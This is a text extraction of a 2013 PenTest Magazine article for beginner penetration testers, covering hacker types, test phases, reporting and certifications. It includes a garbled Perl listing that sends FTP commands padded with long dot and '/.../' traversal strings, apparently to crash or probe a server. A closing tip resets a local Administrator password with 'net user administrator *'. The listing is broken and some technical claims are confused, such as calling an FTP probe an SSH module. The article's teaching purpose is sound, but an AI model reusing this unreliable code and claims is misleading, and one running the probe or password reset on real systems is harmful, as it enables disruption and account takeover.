pentest magazine pivotal basics for every beginner

7/21/2019 PenTest Magazine Pivotal Basics for Every Beginner

http://slidepdf.com/reader/full/pentest-magazine-pivotal-basics-for-every-beginner 1/7Page 6 http://pentestmag.comStartKit 03/2013(03)

FOR REAL BEGINNERS

Ibelieve that penetration testing, and any other in-ternet security field, is more of a frame of mindthan anything, i.e. thinking outside the box. When

a person asks what I do for a living and I tell them Iam a pentester, their response is always the same

– “What is that and how can I get that title?” I havethe same answer every time – a penetration test isa chess match. It is played between the pentesterand the contracting organization’s IT department.You start out as a pawn and end up as a queen.That queen must be able to accomplish check-matein the organization's network infrastructure.

There are three different groups of educated pen-testers. There is the self-educated, which includepeople like gamers and those who are simply curi-ous about how to hack a network. Then you havethe college educated, who decided to go to schooland learn how a network operates and how to se-cure the network. Lastly, you have the third cate-gory, which combines the first two. Neither is betterthan the other, because to become a well-knownpentester, you must be educated in networking,have certifications to prove you can go the extra

mile and be up to date with the latest technologies.

Types of Pentesters A pentester is considered an ethical hacker be-cause there has to be a level of trust between the

hiring organization and the tester. When I tell peo-ple I am a pentester, I usually follow by explain-ing that I am an ethical hacker. It is confusing be-cause these two roles can seem to conflict withone another. Before becoming a pentester, youhave to decide which group of hackers you want tofall under, a white hat, grey hat, black hat hacker,or a script kiddie. The term “hacker” has not al-ways had the negative connotations that it has to-day. A hacker originally described a person with adesire to learn about and experiment with technol-ogy and referred to someone who was technicallyproficient with whatever systems they hacked. Thegroup under which you portray yourself will deter-mine if you should pursue a career as a pentester.

White hats may be security professionals, hiredby companies to audit network security or test soft-ware. Having access to the same software toolsthat other hackers use, a white hat seeks to im-prove the security of a network by attacking a net-work or application as a black hat hacker would. A black hat hacker is a person who attempts to

find network and application security vulnerabili-

ties and exploit them for personal financial gain orother malicious reasons. This differs from white hathackers, who are security specialists employed touse hacking methods to find security flaws thatblack hat hackers may exploit.

Is being a pentester your dream job? Would you like to do

pentesting every day until the death but you do not know whatto start with? In this article I will describe all you need to begin the

journey.

Pivotal Basics for EveryBeginner



Black hat hackers can inflict major damage on bothindividual computer users and large organizations bystealing financial information, compromising the se-

curity of systems, or by dropping a network or chang-ing the function of websites and networks. A grey hat is willing to go to the extremes of both

black and white hat hackers. Black hats typicallyindulge to prove a point that is usually supportedby white hats. A person's grey "principles" are thevery thing that sets them apart from other classi-fied hackers. In most situations, they may not dis-close their activities due to legal consequences. Itis not out of the question for a grey hat hacker tohack for personal gain, although it is also not un-

heard of for them to compromise whole systemsfor the perceived "greater good" either. A script kiddie is a derogatory term used to refer

to non-serious hackers who are believed to rejectthe ethical principles held by professional hackers,which include the pursuit of knowledge, respect forskills, and a motive of self-education. Script kiddiesshortcut most hacking methods in order to quicklygain their hacking skills. They will use resourcessuch as YouTube and watch a video of an actualattack performed by a genuine hacker and then try

to replicate the attack. They attempt to attack andcrack computer networks and vandalize websites.

Although they are considered to be inexperiencedand undeveloped, script kiddies can impose asmuch computer damage as skilled hackers.

The majority of pentesters fall under the whitehat, grey hat, and script kiddie group. You reallycannot be a black hat and a pentester becausethat means you deliberately destroy a networkwhen you perform a pentest. In this industry youwill not last long with that mentality.

Yes, I put some of the pentesters in the scriptkiddie group. Over the years, I have looked overother companies' pentest reports and it baffles mehow some organizations pass off their reports asserious pentest reports when they are more likea vulnerability assessment. I have seen instanceswhen a company would run a vulnerability scan-ner and turn those results in as a pentest report.In other cases, I have seen reports delivered byan organization that only ran Metasploit (which isa program that does exploits for you). The problemwith these situations, is that, first, these are not ex-

amples of penetration tests but rather are just vul-nerability assessments. Second, we lose our skillsas IT security professionals if we rely solely on GUIinterface tools. The only thing you learn from thisexperience is how to use a GUI interface and how

to hit the start button. To me, this is a huge prob-lem. I believe that in order to be a well-known pen-tester, you need to know what is going behind the

scenes of that vulnerability scanner and exploits. Ask yourself what is it actually scanning? When Ibegin a pentest, there is a lot I need to prepare be-fore I even start scanning.

Penetration Testing vs VulnerabilityAssessmentVulnerability Assessment:

• Typically is general in scope and includes anassessment of the network or a web application,

• A scan that will identify known network, oper-ating system, web application, and web serv-er vulnerabilities with the use of GUI Interfacetools and doing very minimal exploiting, “if any,”

• Unreliable at times and high rate of false posi-tives.

Penetration Testing:

• Focused in scope and may include targeted at-tempts to exploit specic vectors,

• Extremely accurate and reliable,• Penetration Testing = vulnerabilities that havebeen exploited and conrmed.

It is impossible to say that a Vulnerability Assess-ment is better choice than a Penetration Test.Both Vulnerability Assessments and PenetrationTests are a necessity to an organization’s networksecurity. I suggest at a minimum, that you run avulnerability assessment at least every threemonths and a full blown Penetration Test once ayear. By doing this, you ensure the hardening ofyour network from hackers.

Testing PhasesThough the methodology used by a pentester maychange depending on individual preferences, cli-ent contract or employer principles – for the mostpart all methodologies include the same stages.

Planning and ScopingThe planning and scoping stage occurs when yourorganization and the client decide what is within

the scope and what needs to be excluded fromthe test. As a pentester, you must be aware of anypotential risks associated with the pentest. Beforeyou start the penetration test always get a “getout of jail free card” – this is a signed document



FOR REAL BEGINNERS

from the organization and yourself. This documentshould include the scope of the test, URLs, Exter -nal and Internal IPs to be tested. Also there needs

to be some verbiage if the network does go downor there is severe bandwidth issues that interruptsthe organizations everyday business continualityfrom your GUI scanners. Also, it should state thatthey have everything backed up and cannot go af-ter you for any reason legally.

Here is an example of a scope between yourselfand the client:

The scope encompassed the internal and externalnetwork infrastructure which included routers, serv-

ers, and rewalls hosted in the organization’s Cin-cinnati, Ohio ofce. The network penetration testwas performed from organization’s network in the

Cincinnati, Ohio ofce.

Information gatheringIn this phase, the penetration tester will accumu-late as much information as possible that will as-sist with the test. This includes public records,email addresses within the organization, and theorganization’s web presence. In the initial stage,

web search engines are used to gather as muchinformation about the target organization as possi-ble including target machines on the network. Thenext step is to find live hosts on the network, whichcan be achieved through the use of discovery toolssuch as Nmap. After gathering a list of machineson the network and the open ports, we have to ver-ify that the ports are actually open. The reason forthis is that sometimes machines give false results,especially UDP ports. So for example, we identi-fied a machine with a lot of ports open and with anIP address of 10.5.1.1. Let’s do a little reconnais-sance on that target.

ReconnaissanceIn this stage, the penetration tester starts to as-sess all of the options available within the scopeof the penetration test. The pentester decideswhat tools are to be used and the method of thepentest itself. This will include methods such asnetwork scanning, enumeration, and code injec-tion. The goal of reconnaissance is to classifyvulnerabilities that the tester will then attempt to

exploit in the next phase. There are many vulner -ability scanners out there, so which one should Iuse? Personally, I use several to make sure thatthere are as few false positives on the vulnerabil-ity report itself. As a penetration tester, you have

to be resourceful and use what is available. Forthis test let’s use a vulnerability scanner withinKali. You are probably also wondering why you

would use a vulnerability scanner when such atool creates a lot of noise on the network? It isvery simple. The job of a penetration tester is tobe as thorough as possible, uncovering as manyholes as they can find. It is always the penetra-tion tester’s job to verify each vulnerability foundbefore marking it as a positive result and to re-move all the false positives. There are hundredsof pages of information in the scan report. I wouldsuggest looking at all of the results. For this case,the one that I am interested in is the vulnerability

marked as high, so I am going to click on this oneand see what it says. The scanning of 10.5.1.1found the password ‘anonymous’ within the FTPaccount.

Here is an example of a vulnerability that couldbe exploited which was found as the result of thevulnerability scanner:

Anonymous FTP

Synopsis: Disable anonymous FTP access. If it is

not needed. Anonymous FTP access can lead toan attacker gaining information about your systemthat can possibly lead to them gaining access toyour system.

Exploitable

Risk Factor: Medium (CVSS 7.1)

Host: 10.5.1.1

ExploitationExploiting is the art of taking advantage of knownvulnerabilities discovered in the scanning phase.The idea is to gain access to the systems as ahacker would and exploit them. This may includeSQL injections, Input Validation, Cross-Site Script-ing and Broken Authentication and Session Man-agement. We will be using the username list thatwe grabbed during the vulnerability assessmentphase (I created a file named anonymous.doc withthe name “anonymous”), and a copy of the pro-vided wordlist that comes within the applications

of Kali. We will also run the SSH module written inPerl, since we already know that the anonymousaccount is enabled for FTP. Let’s look up the CVEnumbers and search Google. CVE-1999-0527 isthe CVE number that I found using Google. So to



make sure this isn’t a false positive, let’s go backto the SSH module and re-scan for an anonymouspassword on the FTP account.

[22][ssh] host: 10.5.1.1 login: anonymous

password: anonymous

Privilege escalationExploiting a system can result in access to the sys-tem with rudimentary privileges. Privilege escala-tion is the process to gain further access and ad-ditional permissions. Learning manual exploits isa key step to becoming a well-known penetrationtester and not using a GUI interface tool to do the

exploit for you. Automated tools can cause a dropin a network’s bandwidth or drop the network it-self. Causing this to happen will give you a badreputation. While pressing start on a GUI tool, itgoes through a lot of unneeded functions like ddosand dos attacks, which are not usually welcomedby your client. It takes a lot of time and practice to

gain privileges to systems doing manual exploitsbut it is well worth it. Although exploiting a systemresults in access, on many instances, that access

is limited to an account with only rudimentary per-missions.

Privilege escalation is the process of using fur-ther techniques or exploits to gain further permis-sions. The more permission gained, the more like-ly a tester is of achieving access to further systemsand confidential data.

For this we will run an SSH module written in Perl(Listing 1). As you can see, we successfully exploited the

FTP account. So you have your results from the

vulnerability scanner(s) and completed a few ex-ploits. Now you have to present to the organiza-tion the vulnerabilities and exploits. This is doneby writing a complete report. Remember to takescreen shots of the exploits so that you have proofof the exploit being completed. This will show theorganization that you truly know what you are do-

Listing 1. SSH module in Perl

#!/usr/bin/perl

$user = "USER anonymous\r\n";$passw = "PASS [email protected], 192.168.91.13,

192.168.91.12, 192.168.90.251,

192.168.90.253\r\n";

$command = "CWD ";

$dos_input = "."x250;

$send = "\r\n";

$socket = IO::Socket::INET->new(

Proto => "tcp",

PeerAddr => "$ARGV[0]",

PeerPort => "$ARGV[1]",

$socket->recv($serverdata, 1024);

print $serverdata;

$socket->send($user);


$socket->send($passw);


$socket->send($command.$dos_input.$send);

$user = "USER anonymous\r\n";

$passw = "PASS [email protected], 192.168.91.13,

192.168.91.12, 192.168.90.251,

192.168.90.253\r\n";

$command = "NLST ";

$dos_input = "/.../.../.../.../.../";

$send = "\r\n";


Proto => "tcp",



$socket->recv($serverdata, 1024);print $serverdata;






$user = "USER anonymous\r\n";

$passw = "PASS [email protected],

192.168.91.10, 192.168.91.13,

192.168.91.12, 192.168.90.251,

192.168.90.253\r\n";

$command = "SIZE ";

$dos_input = "/.../.../.../.../.../";

$send = "\r\n";


Proto => "tcp",




print $serverdata;






$socket->exploit successful/r/n”anonymous”



FOR REAL BEGINNERS

ing as a pentester, and you will be on your way tobecoming a well-known penetration tester.

ReportingThis section provides the contracting organiza-tion a summary of the results from the vulnerabilityscanner and exploits that were accomplished dur -ing the pentest. The report is broken down into twomajor sections in order to communicate the objec-tives, methods, and results of the testing to an ex-ecutive level and IT staff. The report should be bro-ken down into:

• The Executive Summary, which would in-

clude: Executive Summary of the penetrationtest, Scope, Background section explaining theoverall posture of the organization, and a rec-ommendation Summary.

• The Technical Report, which would be orga-nized for the IT staff so that they can reviewand x the vulnerabilities. This part of the re-port should include Information Gathering, Vul-nerability Assessment, Exploitation/ Vulnerabil-ity Conrmation, and the risk of the vulnerabili-ties to the organization.

CertificationsWhy get certifications? Some of the best hack-ers do not have certifications, so why should I getthem? You do so because you want to become awell-known penetration tester and not just a hacker.To do this, you need to show that your skills are upto date and that you are willing to put in the time toshow your employer that you have the skills to doa penetration test. You’re also impressing on youremployer that you’re a valued member of the teamand that you’re willing to learn. There are many cer-tifications to choose from. A few that stand out are:Certified penetration Testing Engineer (C)PTE, Cer -tified Penetration Testing Consultant C)PTC, GIACPenetration Tester (GPEN), Certified Ethical Hacker (CEH) and Offensive Security Certified Professional (OSCP). It seems everyone has their own prefer -ence in choosing which one is better that the other.

SummaryThe process of becoming a well-known penetra-tion tester is not going to happen overnight. Being

a pentester is my dream job when it comes to ITsecurity. Taking this journey and becoming a well-known penetration tester involves the pursuit ofknowledge whether it is self-taught or through for-mal education. It is essential to become acquaint-

ed with network basics, particularly the OSI model,TCP/IP, handshakes, the different types of pack-ets, and what's contained in the headers.

I also suggest getting an understanding of net-work scanners and web application scanners.There are plenty of organizations out there thathave white papers and tutorials regarding net-works and web applications (OWASP, SANS, andNIST). Find practice labs so that you can get prac-tice hacking networks.

With all this documentation and assistance it isquite simple to become a pentester, but to be awell-known pentester you must not be limited toone technology. You virtually need to know every-

thing when it comes to servers, networks, and vul-nerabilities that can be exploited. You need to en-sure that you have a thorough understanding ofsecurity. Associate yourself with experienced pen-testers and join forums and communities that arewilling to extend a helping hand. I was once toldthat the hacking community, in general, is willingto help “newbies” into the hacking community. Ingeneral that is a true statement.

To be a successful and well-known hacker you willneed to understand and be able to write your own

scripts and understand program languages. Whileyou are on your way to learn about programming, themain question to ask is which language to learn? Thisdebate has gone for years and there really is no cor-rect answer to it. Each organization for the most partuses one or two languages for their programming sothat they can master the language and hire skilledprogrammers to keep the organization running. Asa pentester you should know multiple languages tosome degree and understand that language. Pythonis a good language to start off with because it's ef-ficiently designed, well documented in forums, andmoderately kind to beginners. If you get into seriousprogramming, you will have to learn C, the core lan-guage of Unix which a pentester should learn or haveknowledge of. Perl is worth learning for everyday rea-sons; it's very widely used for web pages and systemadministration, so that even if you never write Perl,you should learn to read it. Also, as a penetration tester you must stay up

to date on coding, vulnerabilities, and updates toa network. The organization that hired you will ex-pect you to be current in all subjects related to IT

security. There is a saying “patch Tuesday, hackFriday” – this basically means when Microsoftpatches come out on Tuesday, those pacthes arebeing hacked Friday. Remember there is bronto-bytes of information floating around the web. My


http://slidepdf.com/reader/full/pentest-magazine-pivotal-basics-for-every-beginner 6/7

suggestion is to join forums, hacking organiza-tions, and read white papers form reliable sourcesto stay on top of the new technology out there.

In conclusion, not everyone will want to become apenetration tester or even know what one is, but with-in the professional community, there are some keysteps to becoming well-known and respected. Youmust commit to continuing education, don’t be afraidto ask for help, and practice and develop your skills.

BonusHere is some information which is useful but it didnot fit into the article well.

Key knowledge

• A penetration test is not a vulnerability scan anda vulnerability scan is not a penetration test,

• Learn everything you can about operating sys-tems and servers, not just one avor,

• Understand the true concepts of TCP/IP, Subnets,and Coding in as many languages as possible,

• Remember you will not know everything IT re-lated, Google is your best friend.

TipHere is a tip that an old school hacker sent me atone point in time. It works about 60 percent of thetime depending on the operating system and whatnot. As for all exploits, the same percentage could

go because you are not going to exploit and getroot permissions every time you do a pentest dueto time restraints within the scope.

If you want to hack a computer’s Administrator.If you are logged in to computer with some other

account here are the steps:

• Go to start button click on run• Type CMD and press enter • A command window will open• Type net users• This will show you all the users of that computer.• Now type net user administrator * and press enter • This will ask you to enter a password

• Enter the password you want to keep for theadministrator

• Re-enter your password to conrm it.• DONE

CHRIS BERBERICHChris Berberich is a Penetration Tester/Senior Auditor at

A-lign Security and Compliance Services based in Tam-

pa, Florida. Chris has an extremely deep and solid under-

standing of applications, server, and network security.

Chris’ focus as a penetration tester was managing corpo-rate Internet infrastructure, systems, and network securi-

ty – specifically operating systems, web application serv-

er, databases, interfacing, and data privacy. Certifica-

tions: (C)PEH, (C)PTE. [email protected] .

a d v e r i s e m e n t

mailto:mailto:Chris.berberich%40alignsecurity.com?subject=

http://www.it-securityguard.com/

http://www.it-securityguard.com/

mailto:mailto:Chris.berberich%40alignsecurity.com?subject=


http://slidepdf.com/reader/full/pentest-magazine-pivotal-basics-for-every-beginner 7/7

Specializing in security services including:

Penetration Testing • PCI DSS • FedRAMP • ISO 27001

www.alignsecurity.com • 888.575.7450

pentest magazine pivotal basics for every beginner

Documents